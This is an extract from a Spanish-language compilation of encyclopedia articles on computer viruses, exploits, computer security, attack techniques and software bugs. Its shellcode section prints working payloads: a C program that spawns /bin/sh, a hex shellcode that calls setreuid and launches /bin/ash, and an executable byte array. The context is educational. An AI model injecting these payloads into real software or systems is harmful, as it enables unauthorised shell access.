•• Requieren la intervención del usuario del lado del cliente. Por ejemplo necesitan que abra cierto archivo o quehaga click en cierto link

•• Es un ataque asincrónico porque el momento en que se lanza no es el mismo en que se consigue ejecutar elexploit (ya que necesita la acción del usuario).

•• Se lanza a ciegas, no se sabe qué aplicaciones y versiones de esta utiliza el objetivo real.Según el propósito de su ataque:[2]

•• Curiosidad•• Fama personal•• Beneficio personal•• Espionaje

Frameworks de exploitsLos frameworks de exploits son paquetes software de apoyo que contienen módulos que ayudan para la construcciónde exploits.[3][1] Estos frameworks permiten la reutilización del código, la estandarización de los exploits y lasimplificación del proceso de ataques. Ejemplos de este tipo de frameworks: Metasploit Framework, Core Impact [4],Inmunity Canvas

"Exploits" en los videojuegosHasta ahora el juego en internet más afectado por estos comandos maliciosos es Roblox, el cual es afectado en losservidores publicados en la red. Un "Cracker" con ayuda de un programa especial edita los códigos del servidoractivo, causando desde la aparición de nuevos elementos en el juego, hasta la desconexión de todos los jugadores yrobo de su información actual en el sitio.

Referencias[1][1] Federico G. Pacheco, Hector Jara, "Ethical Hacking 2.0". Ed. Fox Andina 2012[2][2] Andrew Cencini et ali., "Software Vulnerabilities: Full-, Responsible-, and Non-Disclosure". Diciembre 2005.[3][3] Chris McNab,"Network Security Assessment: Know Your Network". Ed. O'Reilly 2004[4] http:/ / www. coresecurity. com/ content/ core-impact-overview

Page 73: Virus informático

Seguridad informática 71

Seguridad informáticaLa seguridad informática o seguridad de tecnologías de la información, es el área de la informática que se enfocaen la protección de la infraestructura computacional y todo lo relacionado con ésta (incluyendo la informacióncontenida). Para ello existen una serie de estándares, protocolos, métodos, reglas, herramientas y leyes concebidaspara minimizar los posibles riesgos a la infraestructura o a la información. La seguridad informática comprendesoftware, bases de datos, metadatos, archivos y todo lo que la organización valore (activo) y signifique un riesgo siésta llega a manos de otras personas. Este tipo de información se conoce como información privilegiada oconfidencial.El concepto de seguridad de la información no debe ser confundido con el de seguridad informática, ya que esteúltimo sólo se encarga de la seguridad en el medio informático, pero la información puede encontrarse en diferentesmedios o formas, y no solo en medios informáticos.La seguridad informática es la disciplina que se ocupa de diseñar las normas, procedimientos, métodos y técnicasdestinados a conseguir un sistema de información seguro y confiable.

ObjetivosLa seguridad informática está concebida para proteger los activos informáticos, entre los que se encuentran.La infraestructura computacional: Es una parte fundamental para el almacenamiento y gestión de la información, asícomo para el funcionamiento mismo de la organización. La función de la seguridad informática en esta área es velarque los equipos funcionen adecuadamente y anticiparse en caso de fallas, planes de robos, incendios, boicot,desastres naturales, fallas en el suministro eléctrico y cualquier otro factor que atente contra la infraestructurainformática.

Los usuariosSon las personas que utilizan la estructura tecnológica, zona de comunicaciones y que gestionan lainformación. La seguridad informática debe establecer normas que minimicen los riesgos a la información oinfraestructura informática. Estas normas incluyen horarios de funcionamiento, restricciones a ciertos lugares,autorizaciones, denegaciones, perfiles de usuario, planes de emergencia, protocolos y todo lo necesario quepermita un buen nivel de seguridad informática minimizando el impacto en el desempeño de los funcionarios yde la organización en general y como principal contribuyente al uso de programas realizados porprogramadores.

AmenazasUna vez que la programación y el funcionamiento de un dispositivo de almacenamiento (o transmisión) de lainformación se consideran seguras, todavía deben ser tenidos en cuenta las circunstancias "no informáticas" quepueden afectar a los datos, las cuales son a menudo imprevisibles o inevitables, de modo que la única protecciónposible es la redundancia (en el caso de los datos) y la descentralización -por ejemplo mediante estructura de redes-(en el caso de las comunicaciones).Estos fenómenos pueden ser causados por:•• El usuario: causa del mayor problema ligado a la seguridad de un sistema informático (porque no le importa, no

se da cuenta o a propósito).• Programas maliciosos: programas destinados a perjudicar o a hacer un uso ilícito de los recursos del sistema. Es

instalado (por inatención o maldad) en el ordenador abriendo una puerta a intrusos o bien modificando los datos.Estos programas pueden ser un virus informático, un gusano informático, un troyano, una bomba lógica o unprograma espía o Spyware.

Page 74: Virus informático

Seguridad informática 72

• Un intruso: persona que consigue acceder a los datos o programas de los cuales no tiene acceso permitido(cracker, defacer, script kiddie o Script boy, viruxer, etc.).

•• Un siniestro (robo, incendio, inundación): una mala manipulación o una malintención derivan a la pérdida delmaterial o de los archivos.

•• El personal interno de Sistemas. Las pujas de poder que llevan a disociaciones entre los sectores y solucionesincompatibles para la seguridad informática.

Tipos de amenazaEl hecho de conectar una red a un entorno externo nos da la posibilidad de que algún atacante pueda entrar en ella,con esto, se puede hacer robo de información o alterar el funcionamiento de la red. Sin embargo el hecho de que lared no sea conectada a un entorno externo no nos garantiza la seguridad de la misma. De acuerdo con el ComputerSecurity Institute (CSI) de San Francisco aproximadamente entre 60 y 80 por ciento de los incidentes de red soncausados desde adentro de la misma. Basado en esto podemos decir que existen 2 tipos de amenazas:•• Amenazas internas: Generalmente estas amenazas pueden ser más serias que las externas por varias razones como

son:-Los usuarios conocen la red y saben cómo es su funcionamiento.-Tienen algún nivel de acceso a la red por las mismas necesidades de su trabajo.-Los IPS y Firewalls son mecanismos no efectivos en amenazas internas.•• Amenazas externas: Son aquellas amenazas que se originan fuera de la red. Al no tener información certera de la

red, un atacante tiene que realizar ciertos pasos para poder conocer qué es lo que hay en ella y buscar la manerade atacarla. La ventaja que se tiene en este caso es que el administrador de la red puede prevenir una buena partede los ataques externos.

La amenaza informática del futuroSi en un momento el objetivo de los ataques fue cambiar las plataformas tecnológicas ahora las tendenciascibercriminales indican que la nueva modalidad es manipular los certificados que contienen la información digital.El área semántica, era reservada para los humanos, se convirtió ahora en el núcleo de los ataques debido a laevolución de la Web 2.0 y las redes sociales, factores que llevaron al nacimiento de la generación 3.0.• Se puede afirmar que “la Web 3.0 otorga contenidos y significados de manera tal que pueden ser comprendidos

por las computadoras, las cuales -por medio de técnicas de inteligencia artificial- son capaces de emular y mejorarla obtención de conocimiento, hasta el momento reservada a las personas”.

•• Es decir, se trata de dotar de significado a las páginas Web, y de ahí el nombre de Web semántica o Sociedad delConocimiento, como evolución de la ya pasada Sociedad de la Información

En este sentido, las amenazas informáticas que viene en el futuro ya no son con la inclusión de troyanos en lossistemas o softwares espías, sino con el hecho de que los ataques se han profesionalizado y manipulan el significadodel contenido virtual.• “La Web 3.0, basada en conceptos como elaborar, compartir y significar, está representando un desafío para los

hackers que ya no utilizan las plataformas convencionales de ataque, sino que optan por modificar lossignificados del contenido digital, provocando así la confusión lógica del usuario y permitiendo de este modo laintrusión en los sistemas”, La amenaza ya no solicita la clave de homebanking del desprevenido usuario, sino quedirectamente modifica el balance de la cuenta, asustando al internauta y, a partir de allí, sí efectuar el robo delcapital”.

Para no ser presa de esta nueva ola de ataques más sutiles, Se recomienda:•• Mantener las soluciones activadas y actualizadas.

Page 75: Virus informático

Seguridad informática 73

•• Evitar realizar operaciones comerciales en computadoras de uso público.•• Verificar los archivos adjuntos de mensajes sospechosos y evitar su descarga en caso de duda.

Tipos de VirusLos virus se pueden clasificar de la siguiente forma:

Virus residentesLa característica principal de estos virus es que se ocultan en la memoria RAM de forma permanente o residente. Deeste modo, pueden controlar e interceptar todas las operaciones llevadas a cabo por el sistema operativo, infectandotodos aquellos ficheros y/o programas que sean ejecutados, abiertos, cerrados, renombrados, copiados. Algunosejemplos de este tipo de virus son: Randex, CMJ, Meve, MrKlunky.

Virus de acción directaAl contrario que los residentes, estos virus no permanecen en memoria. Por tanto, su objetivo prioritario esreproducirse y actuar en el mismo momento de ser ejecutados. Al cumplirse una determinada condición, se activan ybuscan los ficheros ubicados dentro de su mismo directorio para contagiarlos.

Virus de sobreescrituraEstos virus se caracterizan por destruir la información contenida en los ficheros que infectan. Cuando infectan unfichero, escriben dentro de su contenido, haciendo que queden total o parcialmente inservibles.

Virus de boot(bot_kill) o de arranqueLos términos boot o sector de arranque hacen referencia a una sección muy importante de un disco o unidad dealmacenamiento CD,DVD, memorias USB etc. En ella se guarda la información esencial sobre las características deldisco y se encuentra un programa que permite arrancar el ordenador. Este tipo de virus no infecta ficheros, sino losdiscos que los contienen. Actúan infectando en primer lugar el sector de arranque de los dispositivos dealmacenamiento. Cuando un ordenador se pone en marcha con un dispositivo de almacenamiento, el virus de bootinfectará a su vez el disco duro.Los virus de boot no pueden afectar al ordenador mientras no se intente poner en marcha a éste último con un discoinfectado. Por tanto, el mejor modo de defenderse contra ellos es proteger los dispositivos de almacenamiento contraescritura y no arrancar nunca el ordenador con uno de estos dispositivos desconocido en el ordenador.Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE.

Virus de enlace o directorioLos ficheros se ubican en determinadas direcciones (compuestas básicamente por unidad de disco y directorio), queel sistema operativo conoce para poder localizarlos y trabajar con ellos.Los virus de enlace o directorio alteran las direcciones que indican donde se almacenan los ficheros. De este modo,al intentar ejecutar un programa (fichero con extensión EXE o COM) infectado por un virus de enlace, lo que se haceen realidad es ejecutar el virus, ya que éste habrá modificado la dirección donde se encontraba originalmente elprograma, colocándose en su lugar.Una vez producida la infección, resulta imposible localizar y trabajar con los ficheros originales.

Page 76: Virus informático

Seguridad informática 74

Virus cifradosMás que un tipo de virus, se trata de una técnica utilizada por algunos de ellos, que a su vez pueden pertenecer aotras clasificaciones. Estos virus se cifran a sí mismos para no ser detectados por los programas antivirus. Pararealizar sus actividades, el virus se descifra a sí mismo y, cuando ha finalizado, se vuelve a cifrar.

Virus polimórficosSon virus que en cada infección que realizan se cifran de una forma distinta (utilizando diferentes algoritmos yclaves de cifrado). De esta forma, generan una elevada cantidad de copias de sí mismos e impiden que los antiviruslos localicen a través de la búsqueda de cadenas o firmas, por lo que suelen ser los virus más costosos de detectar.

Virus multipartitesVirus muy avanzados, que pueden realizar múltiples infecciones, combinando diferentes técnicas para ello. Suobjetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos, etc.

Virus del FicheroInfectan programas o ficheros ejecutables (ficheros con extensiones EXE y COM). Al ejecutarse el programainfectado, el virus se activa, produciendo diferentes efectos.

Virus de FATLa Tabla de Asignación de Ficheros o FAT es la sección de un disco utilizada para enlazar la información contenidaen éste. Se trata de un elemento fundamental en el sistema. Los virus que atacan a este elemento son especialmentepeligrosos, ya que impedirán el acceso a ciertas partes del disco, donde se almacenan los ficheros críticos para elnormal funcionamiento del ordenador.

Análisis de riesgosVéase también: Análisis de riesgo informático

El activo más importante que se posee es la información y, por lo tanto, deben existir técnicas que la aseguren, másallá de la seguridad física que se establezca sobre los equipos en los cuales se almacena. Estas técnicas las brinda laseguridad lógica que consiste en la aplicación de barreras y procedimientos que resguardan el acceso a los datos ysólo permiten acceder a ellos a las personas autorizadas para hacerlo.Existe un viejo dicho en la seguridad informática que dicta: "lo que no está permitido debe estar prohibido" y éstadebe ser la meta perseguida.Los medios para conseguirlo son:1.1. Restringir el acceso (de personas de la organización y de las que no lo son) a los programas y archivos.2.2. Asegurar que los operadores puedan trabajar pero que no puedan modificar los programas ni los archivos que no

correspondan (sin una supervisión minuciosa).3.3. Asegurar que se utilicen los datos, archivos y programas correctos en/y/por el procedimiento elegido.4.4. Asegurar que la información transmitida sea la misma que reciba el destinatario al cual se ha enviado y que no le

llegue a otro.5.5. Asegurar que existan sistemas y pasos de emergencia alternativos de transmisión entre diferentes puntos.6.6. Organizar a cada uno de los empleados por jerarquía informática, con claves distintas y permisos bien

establecidos, en todos y cada uno de los sistemas o aplicaciones empleadas.7.7. Actualizar constantemente las contraseñas de accesos a los sistemas de cómputo.

Page 77: Virus informático

Seguridad informática 75

Elementos de un análisis de riesgoCuando se pretende diseñar o crear una técnica para implementar un análisis de riesgo informático se pueden tomarlos siguientes puntos como referencia a seguir:•• Planes para reducir los riesgos.

Análisis de impacto al negocioEl reto es asignar estratégicamente los recursos para cada equipo de seguridad y bienes que intervengan, basándoseen el impacto potencial para el negocio, respecto a los diversos incidentes que se deben resolver. Para determinar elestablecimiento de prioridades, el sistema de gestión de incidentes necesita saber el valor de los sistemas deinformación que pueden ser potencialmente afectados por incidentes de seguridad. Esto puede implicar que alguiendentro de la organización asigne un valor monetario a cada equipo y un archivo en la red o asignar un valor relativo acada sistema y la información sobre ella. Dentro de los Valores para el sistema se pueden distinguir:Confidencialidad de la información, la Integridad (aplicaciones e información) y finalmente la Disponibilidad delsistema. Cada uno de estos valores es un sistema independiente del negocio, supongamos el siguiente ejemplo, unservidor Web público pueden poseer los requisitos de confidencialidad de baja (ya que toda la información espública),pero de alta disponibilidad y los requisitos de integridad. En contraste, un sistema de planificación derecursos empresariales (ERP), sistema puede poseer alto puntaje en los tres variables. Los incidentes individualespueden variar ampliamente en términos de alcance e importancia.

Puesta en marcha de una política de seguridadActualmente las legislaciones nacionales de los Estados, obligan a las empresas, instituciones públicas a implantaruna política de seguridad. Ej: En España la Ley Orgánica de Protección de Datos o también llamada LOPD y sunormativa de desarrollo.Generalmente se ocupa exclusivamente a asegurar los derechos de acceso a los datos y recursos con las herramientasde control y mecanismos de identificación. Estos mecanismos permiten saber que los operadores tienen sólo lospermisos que se les dio.La seguridad informática debe ser estudiada para que no impida el trabajo de los operadores en lo que les esnecesario y que puedan utilizar el sistema informático con toda confianza. Por eso en lo referente a elaborar unapolítica de seguridad, conviene:•• Elaborar reglas y procedimientos para cada servicio de la organización.•• Definir las acciones a emprender y elegir las personas a contactar en caso de detectar una posible intrusión•• Sensibilizar a los operadores con los problemas ligados con la seguridad de los sistemas informáticos.Los derechos de acceso de los operadores deben ser definidos por los responsables jerárquicos y no por losadministradores informáticos, los cuales tienen que conseguir que los recursos y derechos de acceso sean coherentescon la política de seguridad definida. Además, como el administrador suele ser el único en conocer perfectamente elsistema, tiene que derivar a la directiva cualquier problema e información relevante sobre la seguridad, yeventualmente aconsejar estrategias a poner en marcha, así como ser el punto de entrada de la comunicación a lostrabajadores sobre problemas y recomendaciones en término de seguridad informática.

Page 78: Virus informático

Seguridad informática 76

Técnicas para asegurar el sistema• Codificar la información: Criptología, Criptografía y Criptociencia, contraseñas difíciles de averiguar a partir de

datos personales del individuo.• Vigilancia de red. Zona desmilitarizada (informática)• Tecnologías repelentes o protectoras: cortafuegos, sistema de detección de intrusos - antispyware, antivirus, llaves

para protección de software, etc. Mantener los sistemas de información con las actualizaciones que más impactenen la seguridad.

• Sistema de Respaldo Remoto. Servicio de backup remoto

Respaldo de InformaciónLa información constituye el activo más importante de las empresas, pudiendo verse afectada por muchos factorestales como robos, incendios, fallas de disco, virus u otros. Desde el punto de vista de la empresa, uno de losproblemas más importantes que debe resolver es la protección permanente de su información crítica.La medida más eficiente para la protección de los datos es determinar una buena política de copias de seguridad obackups: Este debe incluir copias de seguridad completa (los datos son almacenados en su totalidad la primera vez) ycopias de seguridad incrementales (sólo se copian los ficheros creados o modificados desde el último backup). Esvital para las empresas elaborar un plan de backup en función del volumen de información generada y la cantidad deequipos críticos.Un buen sistema de respaldo debe contar con ciertas características indispensables:•• Continuo

El respaldo de datos debe ser completamente automático y continuo. Debe funcionar de forma transparente,sin intervenir en las tareas que se encuentra realizando el usuario.

•• Seguro

Muchos softwares de respaldo incluyen cifrado de datos (128-448 bits), lo cual debe ser hecho localmente enel equipo antes del envío de la información.

•• Remoto

Los datos deben quedar alojados en dependencias alejadas de la empresa.•• Mantención de versiones anteriores de los datos

Se debe contar con un sistema que permita la recuperación de versiones diarias, semanales y mensuales de losdatos.

Hoy en día los sistemas de respaldo de información online (Servicio de backup remoto) están ganando terreno en lasempresas y organismos gubernamentales. La mayoría de los sistemas modernos de respaldo de información onlinecuentan con las máximas medidas de seguridad y disponibilidad de datos. Estos sistemas permiten a las empresascrecer en volumen de información sin tener que estar preocupados de aumentar su dotación física de servidores ysistemas de almacenamiento.

Page 79: Virus informático

Seguridad informática 77

Consideraciones de softwareTener instalado en la máquina únicamente el software necesario reduce riesgos. Así mismo tener controlado elsoftware asegura la calidad de la procedencia del mismo (el software obtenido de forma ilegal o sin garantíasaumenta los riesgos). En todo caso un inventario de software proporciona un método correcto de asegurar lareinstalación en caso de desastre. El software con métodos de instalación rápidos facilita también la reinstalación encaso de contingencia.Existe un software que es conocido por la cantidad de agujeros de seguridad que introduce. Se pueden buscaralternativas que proporcionen iguales funcionalidades pero permitiendo una seguridad extra.

Consideraciones de una redLos puntos de entrada en la red son generalmente el correo, las páginas web y la entrada de ficheros desde discos, ode ordenadores ajenos, como portátiles.Mantener al máximo el número de recursos de red sólo en modo lectura, impide que ordenadores infectadospropaguen virus. En el mismo sentido se pueden reducir los permisos de los usuarios al mínimo.Se pueden centralizar los datos de forma que detectores de virus en modo batch puedan trabajar durante el tiempoinactivo de las máquinas.Controlar y monitorizar el acceso a Internet puede detectar, en fases de recuperación, cómo se ha introducido elvirus.

Algunas afirmaciones erróneas comunes acerca de la seguridad• Mi sistema no es importante para un hacker

Esta afirmación se basa en la idea de que no introducir contraseñas seguras en una empresa no entraña riesgos pues¿quién va a querer obtener información mía?. Sin embargo, dado que los métodos de contagio se realizan por mediode programas automáticos, desde unas máquinas a otras, estos no distinguen buenos de malos, interesantes de nointeresantes, etc. Por tanto abrir sistemas y dejarlos sin claves es facilitar la vida a los virus.•• Estoy protegido pues no abro archivos que no conozco

Esto es falso, pues existen múltiples formas de contagio, además los programas realizan acciones sin la supervisióndel usuario poniendo en riesgo los sistemas.• Como tengo antivirus estoy protegido

En general los programas antivirus no son capaces de detectar todas las posibles formas de contagio existentes, ni lasnuevas que pudieran aparecer conforme los ordenadores aumenten las capacidades de comunicación, además losantivirus son vulnerables a desbordamientos de búfer que hacen que la seguridad del sistema operativo se vea másafectada aún.• Como dispongo de un firewall no me contagio

Esto únicamente proporciona una limitada capacidad de respuesta. Las formas de infectarse en una red son múltiples.Unas provienen directamente de accesos al sistema (de lo que protege un firewall) y otras de conexiones que serealizan (de las que no me protege). Emplear usuarios con altos privilegios para realizar conexiones puede entrañarriesgos, además los firewalls de aplicación (los más usados) no brindan protección suficiente contra el spoofing.• Tengo un servidor web cuyo sistema operativo es un Unix actualizado a la fecha

Puede que este protegido contra ataques directamente hacia el núcleo, pero si alguna de las aplicaciones web (PHP,Perl, Cpanel, etc.) está desactualizada, un ataque sobre algún script de dicha aplicación puede permitir que elatacante abra una shell y por ende ejecutar comandos en el unix.

Page 80: Virus informático

Seguridad informática 78

Organismos oficiales de seguridad informáticaExisten organismos oficiales encargados de asegurar servicios de prevención de riesgos y asistencia a lostratamientos de incidencias, tales como el CERT/CC [1] (Computer Emergency Response Team CoordinationCenter) del SEI [2] (Software Engineering Institute) de la Carnegie Mellon University el cual es un centro de alerta yreacción frente a los ataques informáticos, destinados a las empresas o administradores, pero generalmente estasinformaciones son accesibles a todo el mundo.

Enlaces externosWikilibros• Wikilibros alberga un libro o manual sobre Seguridad informática.• Seguridad informática [3] en Open Directory Project.

Referencias[1] http:/ / www. cert. org[2] http:/ / www. sei. cmu. edu/[3] http:/ / dmoz. org/ World/ Español/ Computadoras/ Seguridad/

Inseguridad informáticaLa inseguridad informática es la falta o poca presencia de seguridad informática en un sistema operativo,aplicación, red o dispositivo, esto permite su demostración por hackers éticos (sombreros blancos) o su explotaciónpor hackers mal intencionados (sombreros negros).

Vulnerabilidades

Abusos CGISon vulnerabilidades que pueden ser explotadas de forma remota mediante la ejecución de un script desde elnavegador (generalmente por http) del atacante sobre el cgi-bin del servidor, esto permite el acceso y manejo deinformación restringida.

Inyección SQLMuchos hackers efectúan gets explotando una vulnerabilidad que permite efectuar una inyección SQL, esto permiteobtener nombre de usuarios, contraseñas, etc.Un XSS (Cross Site Scripting) es una vulnerabilidad provocada por la falta o error de validación en el código html,esto permite la inclusión de cualquier tipo de sintaxis html y logra comprometer la seguridad de la persona queaccede a un exploit de xss desde su navegador cuando este incluye algún scripts (VBS, JS) malicioso que pretendeinfectar su sistema operativo o secuestrar contraseñas, cookies, etc. Es también conocido como "Inyección HTML".

Page 81: Virus informático

Inseguridad informática 79

HackingEl hacking es el arte de la intrusión directa a un sistema informático ayudándose de alguna vulnerabilidad, susintenciones varían desde demostrar dicha vulnerabilidad en un sistema operativo, aplicación, red o dispositivo paraluego crear un parche que logre remendar esa situación, hasta explotar esa vulnerabilidad para fines perjudicialespara la víctima o beneficiosos para los intrusos.

HijackingEl hijacking (del inglés "secuestrar") consiste en ocupar una identidad obteniendo acceso no autorizado a un sistema,módem, cuenta (correo electrónico, banco, etc.) para poder falsificar la identidad de esta persona (autentificación).

DoS y DDoSLos ataques del tipo DoS (Denial of Service) y los ataques DDoS (Distributed Denial of Service) son utilizadosgeneralmente para hacer flood en un servidor y algunas veces hasta logran efectuar un kernel panic en el sistemaoperativo del servidor.

SpoofingEl Spoofing es una técnica del hacking que consiste en falsificar los paquetes enviados, para obtener acceso a unservidor, módem o cualquier otro dispositivo. En términos de seguridad de redes hace referencia al uso de técnicasde suplantación de identidad generalmente con usos maliciosos o de investigación.IP SPOOFING: Suplantación de IP. Consiste básicamente en sustituir la dirección IP origen de un paquete TCP/IPpor otra dirección IP a la cual se desea suplantar. Esto se consigue generalmente gracias a programas destinados aello y puede ser usado para cualquier protocolo dentro de TCP/IP como ICMP, UDP o TCP. Hay que tener en cuentaque las respuestas del host que reciba los paquetes irán dirigidas a la IP falsificada. Por ejemplo si enviamos un ping(paquete icmp "echo request") spoofeado, la respuesta será recibida por el host al que pertenece la IP legalmente.Hay que tener en cuenta que los routers actuales no admiten el envío de paquetes con IP origen no perteneciente auna de las redes que administra (los paquetes spoofeados no sobrepasarán el router).

Ingeniería socialLa ingeniería social consiste en la utilización de técnicas de índole psicológica, para lograr obtener informaciónconfidencial.

CrackingEl cracking es un paradigma del hacking que consiste en saltar barreras impuestas por los sistemas de seguridadinformática (criptografía, autentificación, validación), el cracking también consiste en la modificación de softwarecompilado, agregándole funciones o eliminar las trabas como tiempo de uso (software trial).

Page 82: Virus informático

Inseguridad informática 80

Fuerza bruta

En criptografía

El ataque de fuerza bruta en criptografía consiste en descubrir la clave de un cifrado basándose en su de algoritmoy en una clave similar, la fuerza bruta no puede romper claves modernas como RSA y AES entre otras.

En autentificaciones

Un ataque de fuerza bruta en una autentificación consiste en realizar una gran cantidad de intentos de acceso, cuyacontraseña es variada cada vez que es ingresada, siguiendo una lógica en particular.

Desbordamiento de pilaEn informática, un desbordamiento de pila (stack overflow/overrun) es un problema aritmético que hace referenciaal exceso de flujo de datos almacenados en la pila de una función, esto permite que la dirección de retorno de la pilapueda ser modificada por otra parte de un atacante para obtener un beneficio propio, que generalmente es malicioso.

Desbordamiento de montículoEn informática, un desbordamiento de montículo (heap overflow/overrun) es un problema aritmético que hacereferencia al exceso de flujo de datos sobre un montículo, esto permite un acceso no autorizado a la memoria porparte de un comando o de un programa o script denominado shellcode.

ShellcodeUna shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador y trasladadas aopcodes que suelen ser inyectadas en la pila (o stack) de ejecución de un programa para conseguir que la máquina enla que reside se ejecute la operación que se haya programado.El término shellcode deriva de su propósito general, esto era una porción de un exploit utilizada para obtener unashell. Este es actualmente el propósito más común con que se utilizan. Para crear una shellcode generalmente sueleutilizarse un lenguaje de más alto nivel, como es el caso del lenguaje C, para luego, al ser compilado, generar elcódigo de máquina correspondiente, que es denominado opcode. Un ejemplo de una shellcode escrita en C:

#include <unistd.h>

int main() {

char *scode[2];

scode[0] = "/bin/sh";

scode[1] = NULL;

execve (scode[0], scode, NULL);

}

Esta shellcode, que ejecuta la shell /bin/sh, se vale de la llamada al sistema execve para realizar la ejecución de la shell contenida dentro del array scode. Si analizamos esto en lenguaje ensamblador el funcionamiento es simple: la llamada al sistema específica es cargada detro del registro EAX, los argumentos de la llamada al sistema son puestos en otros registros, se ejecuta la instrucción int 0x80 (que producirá la llamada al sistema) para la creación del

Page 83: Virus informático

Shellcode 81

proceso (pueder hacerse tanto con fork() como con system()), la CPU cambiará ahora al kernel mode (supervisor -ring 0), y la llamada al sistema será ejecutada para así devolver, en este caso, una shell /bin/sh. Si compilamos yejecutamos esto, obtendremos:

$: gcc -static scode.c -o scode

$: ./scode

sh-3.2$

Para obtener el código máquina se desensambla el archivo ya compilado (binario). Pueden utilizarse diversasaplicaciones para esta tarea, entre ellas una de las más populares para sistemas del tipo Unix, es objdump.

$: objdump -d scode

080483a4 <main>:

80483a4: 55 push %ebp

80483a5: 89 e5 mov %esp,%ebp

80483a7: 83 e4 f0 and $0xfffffff0,%esp

80483aa: 83 ec 20 sub $0x20,%esp

80483ad: c7 44 24 18 a0 84 04 movl $0x80484a0,0x18(%esp)

80483b4: 08

80483b5: c7 44 24 1c 00 00 00 movl $0x0,0x1c(%esp)

80483bc: 00

80483bd: 8b 44 24 18 mov 0x18(%esp),%eax

80483c1: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)

80483c8: 00

80483c9: 8d 54 24 18 lea 0x18(%esp),%edx

80483cd: 89 54 24 04 mov %edx,0x4(%esp)

80483d1: 89 04 24 mov %eax,(%esp)

80483d4: e8 ff fe ff ff call 80482d8 <execve@plt>

80483d9: c9 leave

80483da: c3 ret

80483db: 90 nop

En el siguiente ejemplo se muestra una shellcode contenida en un array de un programa escrito en lenguaje C:

char shellcode[]=

"\x31\xc0" /* xorl %eax,%eax */

"\x31\xdb" /* xorl %ebx,%ebx */

"\x31\xc9" /* xorl %ecx,%ecx */

"\xb0\x46" /* movl $0x46,%al */

"\xcd\x80" /* int $0x80 */

"\x50" /* pushl %eax */

"\x68""/ash" /* pushl $0x6873612f */

"\x68""/bin" /* pushl $0x6e69622f */

"\x89\xe3" /* movl %esp,%ebx */

"\x50" /* pushl %eax */

"\x53" /* pushl %ebx */

"\x89\xe1" /* movl %esp,%ecx */

"\xb0\x0b" /* movb $0x0b,%al */

"\xcd\x80" /* int $0x80 */

Page 84: Virus informático

Shellcode 82

;

Así tenemos que una shellcode es código máquina escrito en notación hexadecimal. Posteriormente se utilizan dentrode programas escritos en C, como en el siguiente shellcode de ejemplo:

// shellcode.c

// compilar con gcc shellcode.c -o shellcode

void main()

{

((void(*)(void))

{

"\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9"

"\xb0\x04\xb3\x01\x59\xb2\x21\xcd\x80\x31"

"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff"

"\xff\xff\x76\x69\x73\x69\x74\x61\x20\x68"

"\x74\x74\x70\x3a\x2f\x2f\x68\x65\x69\x6e"

"\x7a\x2e\x68\x65\x72\x6c\x69\x74\x7a\x2e"

"\x63\x6c\x20\x3d\x29"

}

)();

}

Las shellcodes deben ser cortas para poder ser inyectadas dentro de la pila, que generalmente suele ser un espacioreducido.Las shellcodes se utilizan para ejecutar código aprovechando ciertas vulnerabilidades en el código llamadasdesbordamiento de búfer. Principalmente el shellcode se programa para permitir ejecutar un intérprete de comandosen el equipo afectado.Es común que en la compilación de una shellcode se produzcan bytes nulos, los cuales deben ser eliminados de lamisma, ya que frenarían la ejecución de la shellcode. Para ello el programador se vale de diversas técnicas, comoremplazar las instrucciones que genera bytes NULL por otras que no lo hagan o realizar una operación XOR, moverhacia registros más pequeños (como AH, AL), y de esta forma permitir que la shellcode sea realmente inyectable.

Page 85: Virus informático

Error de software 83

Error de software

Foto del origen de la leyenda acerca del primer"bug" informático conocido.

Un error de software, comúnmente conocido como bug (bicho), es unerror o fallo en un programa de computador o sistema de software quedesencadena un resultado indeseado.

En 1947, los creadores de Mark III informaron del primer caso de erroren un ordenador causado por un bug. El Mark II, ordenador sucesor deASCC Mark II, construido en 1944, sufrió un fallo en un reléelectromagnético. Cuando se investigó ese relé, se encontró una polillaque provocó que el relé quedase abierto.

Grace Murray Hopper, licenciada en Física y destacada matemáticaque trabajó como programadora en el Mark II, pegó el insecto concinta adhesiva en la bitácora (imagen [1]) y se refirió a ella como"bicho" para describir la causa del problema.

Este incidente es erróneamente conocido por algunos como el origen de la utilización del término inglés "bug"(bicho) para indicar un problema en un aparato o sistema.[2][3] En realidad, Thomas Alva Edison ya había utilizado"bug" en algunas anotaciones relacionadas con interferencias y mal funcionamiento. Grace lo asoció por primera veza la informática, en este caso, relacionado a un insecto real. No obstante, durante los años 50 del Siglo XX, Gracetambién empleó el término "debug" al hablar de la depuración de errores en los códigos de programación.Los programas que ayudan a detección y eliminación de errores de programación de software son denominadosdepuradores (debuggers)

Defectos de diseño de programas• Diseños con colores inapropiados para las personas que padecen daltonismo•• Diseños que usan textos con tipografías de difícil lectura por su tamaño o diseño.• Diseños que fuerzan el uso del ratón o mouse sin dejar alternativas de teclado para personas con disfunciones

motrices.•• Diseños con implicaciones culturales, por ejemplo usando partes del cuerpo que en una determinada cultura sean

objeto de vergüenza o burla o símbolos con características de identidad cultural o religiosa.• Estimar que el equipo donde se instalará tiene determinadas características (como la resolución de la pantalla, la

velocidad del procesador, la cantidad de memoria o conectividad a internet) propias de un equipo de gama alta, envez de diseñar el software para su ejecución en equipos normales.

Errores de programación comunes•• División por cero•• Ciclo infinito• Problemas aritméticos como desbordamientos (overflow) o subdesbordamientos (underflow).• Exceder el tamaño del array• Utilizar una variable no inicializada• Acceder a memoria no permitida (access violation)• Pérdida de memoria (memory leak)• Desbordamiento o subdesbordamiento de la pila (estructura de datos)• Desbordamiento de búfer (buffer overflow)• Bloqueo mutuo (deadlock)

Page 86: Virus informático

Error de software 84

•• Indizado inadecuado de tablas en bases de datos.

Defectos de instalación o programación• Eliminación o sustitución de bibliotecas comunes a más de un programa o del sistema (DLL Hell).•• Reiniciar arbitrariamente la sesión de un usuario para que la instalación tenga efecto.• Presuponer que el usuario tiene una conexión permanente a internet.• Utilizar como fuente de datos enlaces simbólicos a ficheros que pueden cambiar de ubicación.

